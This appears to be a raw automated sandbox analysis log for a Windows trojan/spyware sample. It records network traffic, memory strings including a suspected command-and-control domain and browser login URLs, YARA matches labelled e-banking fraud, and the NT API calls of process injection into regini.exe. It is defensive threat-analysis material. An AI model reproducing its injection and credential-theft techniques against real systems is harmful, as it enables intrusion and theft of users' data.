                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 626Connection: closeDate: Sun, 24 Nov 2024 07:24:49 GMTServer: Apache
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Sun, 24 Nov 2024 07:24:57 GMTserver: LiteSpeedstrict-transport-security: max-age=63072000; includeSubDomainsx-frame-options: SAMEORIGINx-content-type-options: nosniff
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Sun, 24 Nov 2024 07:24:59 GMTserver: LiteSpeedstrict-transport-security: max-age=63072000; includeSubDomainsx-frame-options: SAMEORIGINx-content-type-options: nosniff
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Sun, 24 Nov 2024 07:25:02 GMTserver: LiteSpeedstrict-transport-security: max-age=63072000; includeSubDomainsx-frame-options: SAMEORIGINx-content-type-options: nosniff
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Sun, 24 Nov 2024 07:25:04 GMTserver: LiteSpeedstrict-transport-security: max-age=63072000; includeSubDomainsx-frame-options: SAMEORIGINx-content-type-options: nosniff
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:25:11 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ucg2Xsi5P7ooaC9F%2BKPYiH20vHxgRauK%2BUnIPS%2FrURGRdHRJxup9d2t%2BtBUrQFO%2F5Z6%2Fkqsw%2Fu6B9vSELzNhmAyJkVbJyN0DdNufKjJImqUYTZuE3KbnQ4jIu0fVTjjCo6cs9P4xDQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e77a9e3c8947291-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1805&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=694&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:25:14 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iVgdUfRKAi8K4pE46ZEoIFJqiYcPB8hm%2BIlyP8CkeMZOH7PHSE2W%2FhGA1y%2F98gr%2Bt6mcymguZ8gzoHxDxPCa2NrlffQKXVj8bg60GNO9qsLfULohGy7qA2u8vjmi%2FTOVGWt%2BKGvKQw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e77a9f5093f0c90-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1447&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=718&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:25:17 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fexONy%2Bob8N63dYQRWbXx8Ca4d62lIxKAfR4uX7H2GjwdH1u445ulTczFMmDoQUFm48ywJX3yH9AQJ8Xsw1bJBUc%2F2NGKbPZj%2BYChPH03l3FcWm2uH2ZhlWqT4gbqQ9Pdd7x1rFOMA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e77aa05f9ce4210-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1566&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1731&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:25:20 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QIBk17vPXbDECxtpzTCXTjUW6BZ7IaOe6646%2Bz0Rzdkumw10X%2BR%2FN3XoZDFOZpYWjY3uB6EbYq%2BUpF5SM3EVAXcqg3h22CJ%2FtWQzav437hw2pm%2BPIwdrn9smBJmjq%2FNyO7qHkSpGrg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e77aa16cad4c47f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1698&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=426&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: file.exeString found in binary or memory: http://tempuri.org/ianiDataSet.xsd
                Source: file.exeString found in binary or memory: http://tempuri.org/ianiDataSet1.xsd
                Source: file.exeString found in binary or memory: http://tempuri.org/ianiDataSet2.xsdM
                Source: QmkRHPDwxbW.exe, 00000008.00000002.3757593564.0000000005890000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.izmirescortg.xyz
                Source: QmkRHPDwxbW.exe, 00000008.00000002.3757593564.0000000005890000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.izmirescortg.xyz/cxxv/
                Source: regini.exe, 00000007.00000003.1693124724.0000000007648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: regini.exe, 00000007.00000003.1693124724.0000000007648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: regini.exe, 00000007.00000003.1693124724.0000000007648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: regini.exe, 00000007.00000003.1693124724.0000000007648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: regini.exe, 00000007.00000003.1693124724.0000000007648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: regini.exe, 00000007.00000003.1693124724.0000000007648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: regini.exe, 00000007.00000003.1693124724.0000000007648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: regini.exe, 00000007.00000002.3756768985.0000000003DEE000.00000004.10000000.00040000.00000000.sdmp, regini.exe, 00000007.00000002.3759140803.0000000005A90000.00000004.00000800.00020000.00000000.sdmp, QmkRHPDwxbW.exe, 00000008.00000002.3755312225.0000000003F9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://kb.fastpanel.direct/troubleshoot/
                Source: regini.exe, 00000007.00000002.3752723389.00000000025BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: regini.exe, 00000007.00000002.3752723389.00000000025E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: regini.exe, 00000007.00000002.3752723389.00000000025BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: regini.exe, 00000007.00000002.3752723389.00000000025BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: regini.exe, 00000007.00000002.3752723389.00000000025BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: regini.exe, 00000007.00000002.3752723389.00000000025E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: regini.exe, 00000007.00000003.1688328353.0000000007566000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: regini.exe, 00000007.00000003.1693124724.0000000007648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: regini.exe, 00000007.00000002.3759140803.0000000005A90000.00000004.00000800.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3756768985.0000000004436000.00000004.10000000.00040000.00000000.sdmp, QmkRHPDwxbW.exe, 00000008.00000002.3755312225.00000000045E6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: regini.exe, 00000007.00000003.1693124724.0000000007648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                E-Banking Fraud

                Source: Yara matchFile source: 4.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.3755526536.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3755365242.00000000029C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1502482858.0000000001AC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3750507346.0000000002400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1501034041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1502647624.00000000025A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\file.exe, Code function: 4_2_0042C8D3 NtClose,4_2_0042C8D3
                Source: C:\Users\user\Desktop\file.exe, Code function: 4_2_017E2B60 NtClose,LdrInitializeThunk,4_2_017E2B60
                Source: C:\Users\user\Desktop\file.exe, Code function: 4_2_017E2DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_017E2DF0
                Source: C:\Users\user\Desktop\file.exe, Code function: 4_2_017E2C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_017E2C70
                Source: C:\Users\user\Desktop\file.exe, Code function: 4_2_017E35C0 NtCreateMutant,LdrInitializeThunk,4_2_017E35C0
                Source: C:\Users\user\Desktop\file.exe, Code function: 4_2_017E4340 NtSetContextThread,4_2_017E4340
                Source: C:\Users\user\Desktop\file.exe, Code function: 4_2_017E4650 NtSuspendThread,4_2_017E4650
                Source: C:\Users\user\Desktop\file.exe, Code function: 4_2_017E2BF0 NtAllocateVirtualMemory,4_2_017E2BF0
                Source: C:\Users\user\Desktop\file.exe, Code function: 4_2_017E2BE0 NtQueryValueKey,4_2_017E2BE0
                Source: C:\Users\user\Desktop\file.exe, Code function: 4_2_017E2BA0 NtEnumerateValueKey,4_2_017E2BA0
                Source: C:\Users\user\Desktop\file.exe, Code function: 4_2_017E2B80 NtQueryInformationFile,4_2_017E2B80
                Source: C:\Users\user\Desktop\file.exe, Code function: 4_2_017E2AF0 NtWriteFile,4_2_017E2AF0
                Source: C:\Users\user\Desktop\file.exe, Code function: 4_2_017E2AD0 NtReadFile,4_2_017E2AD0
                Source: C:\Users\user\Desktop\file.exe, Code function: 4_2_017E2AB0 NtWaitForSingleObject,4_2_017E2AB0
                Source: C:\Users\user\Desktop\file.exe, Code function: 4_2_017E2D30 NtUnmapViewOfSection,4_2_017E2D30
                Source: C:\Users\user\Desktop\file.exe, Code function: 4_2_017E2D10 NtMapViewOfSection,4_2_017E2D10
                Source: C:\Users\user\Desktop\file.exe, Code function: 4_2_017E2D00 NtSetInformationFile,4_2_017E2D00
                Source: C:\Users\user\Desktop\file.exe, Code function: 4_2_017E2DD0 NtDelayExecution,4_2_017E2DD0
                Source: C:\Users\user\Desktop\file.exe, Code function: 4_2_017E2DB0 NtEnumerateKey,4_2_017E2DB0
                Source: C:\Users\user\Desktop\file.exe, Code function: 4_2_017E2C60 NtCreateKey,4_2_017E2C60
                Source: C:\Users\user\Desktop\file.exe, Code function: 4_2_017E2C00 NtQueryInformationProcess,4_2_017E2C00
                Source: C:\Users\user\Desktop\file.exe, Code function: 4_2_017E2CF0 NtOpenProcess,4_2_017E2CF0
                Source: C:\Users\user\Desktop\file.exe, Code function: 4_2_017E2CC0 NtQueryVirtualMemory,4_2_017E2CC0
                Source: C:\Users\user\Desktop\file.exe, Code function: 4_2_017E2CA0 NtQueryInformationToken,4_2_017E2CA0
                Source: C:\Users\user\Desktop\file.exe, Code function: 4_2_017E2F60 NtCreateProcessEx,4_2_017E2F60
                Source: C:\Users\user\Desktop\file.exe, Code function: 4_2_017E2F30 NtCreateSection,4_2_017E2F30
                Source: C:\Users\user\Desktop\file.exe, Code function: 4_2_017E2FE0 NtCreateFile,4_2_017E2FE0
                Source: C:\Users\user\Desktop\file.exe, Code function: 4_2_017E2FB0 NtResumeThread,4_2_017E2FB0
                Source: C:\Users\user\Desktop\file.exe, Code function: 4_2_017E2FA0 NtQuerySection,4_2_017E2FA0
                Source: C:\Users\user\Desktop\file.exe, Code function: 4_2_017E2F90 NtProtectVirtualMemory,4_2_017E2F90
                Source: C:\Users\user\Desktop\file.exe, Code function: 4_2_017E2E30 NtWriteVirtualMemory,4_2_017E2E30
                Source: C:\Users\user\Desktop\file.exe, Code function: 4_2_017E2EE0 NtQueueApcThread,4_2_017E2EE0
                Source: C:\Users\user\Desktop\file.exe, Code function: 4_2_017E2EA0 NtAdjustPrivilegesToken,4_2_017E2EA0
                Source: C:\Users\user\Desktop\file.exe, Code function: 4_2_017E2E80 NtReadVirtualMemory,4_2_017E2E80
                Source: C:\Users\user\Desktop\file.exe, Code function: 4_2_017E3010 NtOpenDirectoryObject,4_2_017E3010
                Source: C:\Users\user\Desktop\file.exe, Code function: 4_2_017E3090 NtSetValueKey,4_2_017E3090
                Source: C:\Users\user\Desktop\file.exe, Code function: 4_2_017E39B0 NtGetContextThread,4_2_017E39B0
                Source: C:\Users\user\Desktop\file.exe, Code function: 4_2_017E3D70 NtOpenThread,4_2_017E3D70
                Source: C:\Users\user\Desktop\file.exe, Code function: 4_2_017E3D10 NtOpenProcessToken,4_2_017E3D10
                Source: C:\Windows\SysWOW64\regini.exe, Code function: 7_2_02B84340 NtSetContextThread,LdrInitializeThunk,7_2_02B84340
                Source: C:\Windows\SysWOW64\regini.exe, Code function: 7_2_02B84650 NtSuspendThread,LdrInitializeThunk,7_2_02B84650
                Source: C:\Windows\SysWOW64\regini.exe, Code function: 7_2_02B82AF0 NtWriteFile,LdrInitializeThunk,7_2_02B82AF0
                Source: C:\Windows\SysWOW64\regini.exe, Code function: 7_2_02B82AD0 NtReadFile,LdrInitializeThunk,7_2_02B82AD0
                Source: C:\Windows\SysWOW64\regini.exe, Code function: 7_2_02B82BA0 NtEnumerateValueKey,LdrInitializeThunk,7_2_02B82BA0
                Source: C:\Windows\SysWOW64\regini.exe, Code function: 7_2_02B82BF0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_02B82BF0
                Source: C:\Windows\SysWOW64\regini.exe, Code function: 7_2_02B82BE0 NtQueryValueKey,LdrInitializeThunk,7_2_02B82BE0
                Source: C:\Windows\SysWOW64\regini.exe, Code function: 7_2_02B82B60 NtClose,LdrInitializeThunk,7_2_02B82B60
                Source: C:\Windows\SysWOW64\regini.exe, Code function: 7_2_02B82E80 NtReadVirtualMemory,LdrInitializeThunk,7_2_02B82E80
                Source: C:\Windows\SysWOW64\regini.exe, Code function: 7_2_02B82EE0 NtQueueApcThread,LdrInitializeThunk,7_2_02B82EE0
                Source: C:\Windows\SysWOW64\regini.exe, Code function: 7_2_02B82FB0 NtResumeThread,LdrInitializeThunk,7_2_02B82FB0
                Source: C:\Windows\SysWOW64\regini.exe, Code function: 7_2_02B82FE0 NtCreateFile,LdrInitializeThunk,7_2_02B82FE0
                Source: C:\Windows\SysWOW64\regini.exe, Code function: 7_2_02B82F30 NtCreateSection,LdrInitializeThunk,7_2_02B82F30
                Source: C:\Windows\SysWOW64\regini.exe, Code function: 7_2_02B82CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_02B82CA0
                Source: C:\Windows\SysWOW64\regini.exe, Code function: 7_2_02B82C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_02B82C70
                Source: C:\Windows\SysWOW64\regini.exe, Code function: 7_2_02B82C60 NtCreateKey,LdrInitializeThunk,7_2_02B82C60
                Source: C:\Windows\SysWOW64\regini.exe, Code function: 7_2_02B82DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_02B82DF0
                Source: C:\Windows\SysWOW64\regini.exe, Code function: 7_2_02B82DD0 NtDelayExecution,LdrInitializeThunk,7_2_02B82DD0
                Source: C:\Windows\SysWOW64\regini.exe, Code function: 7_2_02B82D30 NtUnmapViewOfSection,LdrInitializeThunk,7_2_02B82D30
                Source: C:\Windows\SysWOW64\regini.exe, Code function: 7_2_02B82D10 NtMapViewOfSection,LdrInitializeThunk,7_2_02B82D10
                Source: C:\Windows\SysWOW64\regini.exe, Code function: 7_2_02B835C0 NtCreateMutant,LdrInitializeThunk,7_2_02B835C0
                Source: C:\Windows\SysWOW64\regini.exe, Code function: 7_2_02B839B0 NtGetContextThread,LdrInitializeThunk,7_2_02B839B0
                Source: C:\Windows\SysWOW64\regini.exe, Code function: 7_2_02B82AB0 NtWaitForSingleObject,7_2_02B82AB0
                Source: C:\Windows\SysWOW64\regini.exe, Code function: 7_2_02B82B80 NtQueryInformationFile,7_2_02B82B80
                Source: C:\Windows\SysWOW64\regini.exe, Code function: 7_2_02B82EA0 NtAdjustPrivilegesToken,7_2_02B82EA0
                Source: C:\Windows\SysWOW64\regini.exe, Code function: 7_2_02B82E30 NtWriteVirtualMemory,7_2_02B82E30
                Source: C:\Windows\SysWOW64\regini.exe, Code function: 7_2_02B82FA0 NtQuerySection,7_2_02B82FA0
                Source: C:\Windows\SysWOW64\regini.exe, Code function: 7_2_02B82F90 NtProtectVirtualMemory,7_2_02B82F90
                Source: C:\Windows\SysWOW64\regini.exe, Code function: 7_2_02B82F60 NtCreateProcessEx,7_2_02B82F60
                Source: C:\Windows\SysWOW64\regini.exe, Code function: 7_2_02B82CF0 NtOpenProcess,7_2_02B82CF0
                Source: C:\Windows\SysWOW64\regini.exe, Code function: 7_2_02B82CC0 NtQueryVirtualMemory,7_2_02B82CC0
                Source: C:\Windows\SysWOW64\regini.exe, Code function: 7_2_02B82C00 NtQueryInformationProcess,7_2_02B82C00
                Source: C:\Windows\SysWOW64\regini.exe, Code function: 7_2_02B82DB0 NtEnumerateKey,7_2_02B82DB0
                Source: C:\Windows\SysWOW64\regini.exe, Code function: 7_2_02B82D00 NtSetInformationFile,7_2_02B82D00
                Source: C:\Windows\SysWOW64\regini.exe, Code function: 7_2_02B83090 NtSetValueKey,7_2_02B83090
                Source: C:\Windows\SysWOW64\regini.exe, Code function: 7_2_02B83010 NtOpenDirectoryObject,7_2_02B83010
                Source: C:\Windows\SysWOW64\regini.exe, Code function: 7_2_02B83D10 NtOpenProcessToken,7_2_02B83D10
                Source: C:\Windows\SysWOW64\regini.exe, Code function: 7_2_02B83D70 NtOpenThread,7_2_02B83D70
                Source: C:\Windows\SysWOW64\regini.exe, Code function: 7_2_024293F0 NtCreateFile,7_2_024293F0
                Source: C:\Windows\SysWOW64\regini.exe, Code function: 7_2_02429640 NtDeleteFile,7_2_02429640
                Source: C:\Windows\SysWOW64\regini.exe, Code function: 7_2_024296E0 NtClose,7_2_024296E0
                Source: C:\Windows\SysWOW64\regini.exe, Code function: 7_2_02429550 NtReadFile,7_2_02429550
                Source: C:\Windows\SysWOW64\regini.exe, Code function: 7_2_02429850 NtAllocateVirtualMemory,7_2_02429850
                Source: C:\Windows\SysWOW64\regini.exe, Code function: 7_2_02E6F0E6 NtReadVirtualMemory,7_2_02E6F0E6
                Source: C:\Windows\SysWOW64\regini.exe, Code function: 7_2_02E6F149 NtReadVirtualMemory,7_2_02E6F149
                Source: C:\Windows\SysWOW64\regini.exe, Code function: 7_2_02E6F795 NtClose,7_2_02E6F795
                Source: C:\Windows\SysWOW64\regini.exe, Code function: String function: 02B3B970 appears 283 times
                Source: C:\Windows\SysWOW64\regini.exe, Code function: String function: 02B97E54 appears 100 times
                Source: C:\Windows\SysWOW64\regini.exe, Code function: String function: 02B85130 appears 58 times
                Source: C:\Windows\SysWOW64\regini.exe, Code function: String function: 02BCF290 appears 105 times
                Source: C:\Windows\SysWOW64\regini.exe, Code function: String function: 02BBEA12 appears 86 times
                Source: C:\Users\user\Desktop\file.exe, Code function: String function: 0179B970 appears 283 times
                Source: C:\Users\user\Desktop\file.exe, Code function: String function: 017E5130 appears 58 times
                Source: C:\Users\user\Desktop\file.exe, Code function: String function: 0182F290 appears 105 times
                Source: C:\Users\user\Desktop\file.exe, Code function: String function: 017F7E54 appears 100 times
                Source: C:\Users\user\Desktop\file.exe, Code function: String function: 0181EA12 appears 86 times
                Source: file.exe, 00000001.00000002.1303927449.0000000002743000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameArthur.dll" vs file.exe
                Source: file.exe, 00000001.00000002.1302022571.000000000085E000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameclr.dllT vs file.exe
                Source: file.exe, 00000001.00000000.1280172327.0000000000242000.00000002.00000001.01000000.00000004.sdmp, Binary or memory string: OriginalFilenameBQCU.exe4 vs file.exe
                Source: file.exe, 00000001.00000002.1307923137.0000000004EA0000.00000004.08000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenameArthur.dll" vs file.exe
                Source: file.exe, 00000001.00000002.1309009294.0000000007400000.00000004.08000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenameMontero.dll8 vs file.exe
                Source: file.exe, 00000004.00000002.1501327287.00000000011E8000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameREGINI.EXEj% vs file.exe
                Source: file.exe, 00000004.00000002.1501644059.000000000189D000.00000040.00001000.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamentdll.dllj% vs file.exe
                Source: file.exe, Binary or memory string: OriginalFilenameBQCU.exe4 vs file.exe
                Source: file.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exe, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 1.2.file.exe.39b31a0.0.raw.unpack, bRKVLAxVgLuKVK4XDc.cs, Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 1.2.file.exe.39b31a0.0.raw.unpack, bRKVLAxVgLuKVK4XDc.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 1.2.file.exe.7400000.4.raw.unpack, bRKVLAxVgLuKVK4XDc.cs, Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 1.2.file.exe.7400000.4.raw.unpack, bRKVLAxVgLuKVK4XDc.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 1.2.file.exe.7400000.4.raw.unpack, iHVIqRWtieGe6IZObc.cs, Security API names: _0020.SetAccessControl
                Source: 1.2.file.exe.7400000.4.raw.unpack, iHVIqRWtieGe6IZObc.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 1.2.file.exe.7400000.4.raw.unpack, iHVIqRWtieGe6IZObc.csSecurity API names: _0020.AddAccessRule
                Source: 1.2.file.exe.39b31a0.0.raw.unpack, iHVIqRWtieGe6IZObc.csSecurity API names: _0020.SetAccessControl
                Source: 1.2.file.exe.39b31a0.0.raw.unpack, iHVIqRWtieGe6IZObc.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 1.2.file.exe.39b31a0.0.raw.unpack, iHVIqRWtieGe6IZObc.csSecurity API names: _0020.AddAccessRule
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@13/13
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log
                Source: C:\Users\user\Desktop\file.exeMutant created: NULL
                Source: C:\Windows\SysWOW64\regini.exeFile created: C:\Users\user\AppData\Local\Temp\7046-nn1K
                Source: file.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: file.exe, 00000001.00000000.1280172327.0000000000242000.00000002.00000001.01000000.00000004.sdmp, regini.exe, 00000007.00000002.3756768985.000000000322C000.00000004.10000000.00040000.00000000.sdmp, regini.exe, 00000007.00000002.3755068155.00000000028B5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.1801910689.000000002B8AC000.00000004.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO [dbo].[CREDIT_PLAN] ([CREDIT_ID], [MATURITY_DATE], [MATURITY_SUM], [MATURITY_NOTE], [MODIF_DATE]) VALUES (@CREDIT_ID, @MATURITY_DATE, @MATURITY_SUM, @MATURITY_NOTE, @MODIF_DATE);
                Source: file.exe, 00000001.00000000.1280172327.0000000000242000.00000002.00000001.01000000.00000004.sdmp, regini.exe, 00000007.00000002.3756768985.000000000322C000.00000004.10000000.00040000.00000000.sdmp, regini.exe, 00000007.00000002.3755068155.00000000028B5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.1801910689.000000002B8AC000.00000004.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO [dbo].[CREDIT_PRODUCT] ([PROD_NAME], [PROD_ACTIVE], [PROD_SUM_FROM], [PROD_SUM_TO], [MODIF_DATE], [INTEREST]) VALUES (@PROD_NAME, @PROD_ACTIVE, @PROD_SUM_FROM, @PROD_SUM_TO, @MODIF_DATE, @INTEREST);
                Source: file.exe, 00000001.00000000.1280172327.0000000000242000.00000002.00000001.01000000.00000004.sdmp, regini.exe, 00000007.00000002.3756768985.000000000322C000.00000004.10000000.00040000.00000000.sdmp, regini.exe, 00000007.00000002.3755068155.00000000028B5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.1801910689.000000002B8AC000.00000004.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE [dbo].[Login] SET [User_id] = @User_id, [User_pass] = @User_pass WHERE (([User_id] = @Original_User_id) AND ([User_pass] = @Original_User_pass));
                Source: file.exe, 00000001.00000000.1280172327.0000000000242000.00000002.00000001.01000000.00000004.sdmp, regini.exe, 00000007.00000002.3756768985.000000000322C000.00000004.10000000.00040000.00000000.sdmp, regini.exe, 00000007.00000002.3755068155.00000000028B5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.1801910689.000000002B8AC000.00000004.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE [dbo].[CREDIT_PLAN] SET [CREDIT_ID] = @CREDIT_ID, [MATURITY_DATE] = @MATURITY_DATE, [MATURITY_SUM] = @MATURITY_SUM, [MATURITY_NOTE] = @MATURITY_NOTE, [MODIF_DATE] = @MODIF_DATE WHERE (([MATURITY_ID] = @Original_MATURITY_ID) AND ((@IsNull_CREDIT_ID = 1 AND [CREDIT_ID] IS NULL) OR ([CREDIT_ID] = @Original_CREDIT_ID)) AND ([MATURITY_DATE] = @Original_MATURITY_DATE) AND ([MATURITY_SUM] = @Original_MATURITY_SUM) AND ((@IsNull_MATURITY_NOTE = 1 AND [MATURITY_NOTE] IS NULL) OR ([MATURITY_NOTE] = @Original_MATURITY_NOTE)) AND ((@IsNull_MODIF_DATE = 1 AND [MODIF_DATE] IS NULL) OR ([MODIF_DATE] = @Original_MODIF_DATE)));
